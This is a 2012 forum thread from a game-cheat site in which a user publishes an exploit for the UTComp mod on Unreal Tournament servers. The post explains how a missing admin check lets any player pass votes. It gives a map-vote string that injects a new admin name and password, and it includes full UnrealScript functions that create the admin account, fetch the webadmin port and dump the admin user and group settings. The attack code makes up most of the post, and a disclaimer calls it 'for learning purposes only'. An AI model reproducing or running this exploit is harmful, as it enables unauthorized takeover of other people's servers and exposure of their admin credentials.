UTCheats.net - Unreal Tournament & Tactical Ops cheats and hacks

Please login or register.

Login with username, password and session length
Advanced search  

News:

Welcome to UTCHEATS.NET

Author Topic: UTComp Admin Hack.  (Read 5851 times)

xdemic

  • Newbie
  • *
  • Posts: 4
    • View Profile
UTComp Admin Hack.
« on: June 06, 2012, 11:04:21 PM »

A few months ago I found a exploit in the UTComp mod that allowed players to hack into the admin / webadmin of any UTComp server with UTComp voting enabled.

It works by lack of an actual "is really an admin" check on a function that is meant to allow administrators too pass any vote,  any client can successfully call this function in code. 

You execute a map vote, but behind the map name you can input options create an admin account like so: DM-Rankin?AdminName=MyName?AdminPassword=MyPass, the map will change and you should now be able to login using your new account, from there you can use the commands I've included to get access to webadmin groups and listenport.

Unfortunately I told some people it was UTComp related, who then told others and soon enough the information was public knowledge and Wormbo created a post to inform the community, causing everyone to remove UTComp  or Disable Voting.
 
Now that this is public news I'm sharing this code snippet:

Code: [Select]
//====================================
// UTComp Admin Hack
// by xdemic
//====================================

//Add an admin account !
exec function AddUser( string User, string Pass )
{
   local string Jack3r;

   Jack3r = xPC.GetURLMap(FALSE) $ "?AdminName=" $User $"?AdminPassword=" $Pass;

   UTCompPass(7, 0, Jack3r);
   xPC.ClientMessage("Admin account created! User:"@User@"Pass:"@Pass);
}

exec function GetWebAdminURL()
{
local string a,b;

   if ( xPC.PlayerReplicationInfo.bAdmin )
   {
      a = Left( xPC.GetServerNetworkAddress(), inStr(xPC.GetServerNetworkAddress(), ":") );
      xPC.ConsoleCommand("Admin GET UWeb.WebServer ListenPort");
      b = a $ ":" ;
     
      xPC.CopyToClipboard( b );
      xPC.ClientMessage("IP Data copied to clipboard !");
      xPC.ClientMessage("Web Admin listenport:");
   }
   else
   {
      xPC.ClientMessage("you need administrator access !");
   }
}

exec function GetAdminGroups()
{
   if ( xPC.PlayerReplicationInfo.bAdmin )
   {
      LOG(xPC.ConsoleCommand("Admin GET XAdmin.xAdminConfigIni AdminUsers"));
      LOG(xPC.ConsoleCommand("Admin GET XAdmin.xAdminConfigIni AdminGroups"));
   }
   else
   {
      xPC.ClientMessage("you need administrator access !");
   }
}

//Pass any vote like an admin
exec function UTCompPass(byte VoteType, byte Switch, optional String Options, optional String Caller, optional Byte P2, optional String Options2)
{
   local UTComp_PRI UPRI;
   
   UPRI = GetUTCompPRI(xPC.PlayerReplicationInfo);
   UPRI.PassVote(VoteType,Switch,Options,Caller,P2,Options2);
}

function UTComp_PRI GetUTCompPRI(PlayerReplicationInfo PRI)
{
  local LinkedReplicationInfo lPRI;

  if ( PRI.CustomReplicationInfo == None )
  {
    return None;
  }
  if ( UTComp_PRI(PRI.CustomReplicationInfo) != None )
  {
    return UTComp_PRI(PRI.CustomReplicationInfo);
  }

  for ( lPRI = PRI.CustomReplicationInfo.NextReplicationInfo; lPRI != None; lPRI = lPRI.NextReplicationInfo )
  {
    if ( UTComp_PRI(lPRI) != None )
    {
      return UTComp_PRI(lPRI);
    }
  }

  return None;
}

Remember you need to depend on UTComp in the editpackages list when you compile!

I'm not responsible for any damages caused by use of this exploit, I'm sharing for learning purposes only.
« Last Edit: June 15, 2012, 05:09:51 AM by xdemic »
Logged

Xecutioner

  • Killing Spree
  • **
  • Posts: 30
    • View Profile
Re: UTComp Admin Hack.
« Reply #1 on: June 08, 2012, 08:19:11 PM »

Nice, some unique content up in this bitch! 
Logged

xdemic

  • Newbie
  • *
  • Posts: 4
    • View Profile
Re: UTComp Admin Hack.
« Reply #2 on: June 09, 2012, 03:29:54 AM »

Nice, some unique content up in this bitch! 

:D
Logged